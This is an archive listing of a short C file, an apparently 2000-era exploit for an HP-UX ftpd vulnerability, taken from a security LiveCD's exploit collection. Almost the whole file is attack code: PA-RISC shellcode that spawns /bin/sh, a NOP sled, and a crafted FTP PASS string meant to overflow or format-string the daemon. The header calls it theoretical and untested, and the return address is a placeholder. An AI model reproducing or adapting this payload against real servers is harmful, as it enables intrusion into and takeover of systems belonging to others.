home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / hpux / local / urban2.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  1.2 KB  |  41 lines
  1. /* theoretical exploit for hpux ftpd vulnerability              */
  2. /* not tested anywhere, needs tweaking                          */
  3.  
  4. /* (c) 2000 by babcia padlina ltd. <venglin@freebsd.lublin.pl>  */
  5.  
  6. #include <stdio.h>
  7. #include <stdlib.h>
  8.  
  9. #define NOPS 100
  10. #define BUFSIZE 1024
  11.  
  12. char shellcode[] =                       /*   HP-UX shellcode   */
  13.   "\x34\x16\x05\x06\x96\xd6\x05\x34\x20\x20\x08\x01\xe4\x20\xe0\x08\x0b"
  14.   "\x5a\x02\x9a\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41"
  15.   "\x04\x02\x60\x40\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02"
  16.   "\x98\x34\x16\x04\xbe\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34"
  17.   "\xde\xad\xca\xfe\x2f\x62\x69\x6e\x2f\x73\x68";
  18.  
  19. char nop[] = "\x08\x21\x02\x80";                /*  PA-RISC NOP */
  20.  
  21. unsigned long ret = 0xdeadbeef;
  22.  
  23. int main(argc, argv)
  24. int argc;
  25. char **argv;
  26. {
  27.   int stackofs;
  28.   char buf[BUFSIZ*2];
  29.   int i;
  30.  
  31.   for (strcpy(buf, "PASS "),i=0;i<NOPS;i++) strcat(buf, nop);
  32.   sprintf(buf+strlen(buf), "%s%%.%dd%c%c%c%c", shellcode,
  33.     BUFSIZE-strlen(shellcode)-NOPS*4-4,
  34.     ((int)ret & 0xff), (((int)ret & 0xff00) >> 8),
  35.     (((int)ret & 0xff0000) >> 16),
  36.     (((int)ret & 0xff000000) >> 24));
  37.   printf("USER ftp\r\n%s\r\n", buf);
  38.  
  39.   exit(0);
  40. }
  41. /*                   www.hack.co.za   [1 December 2000]*/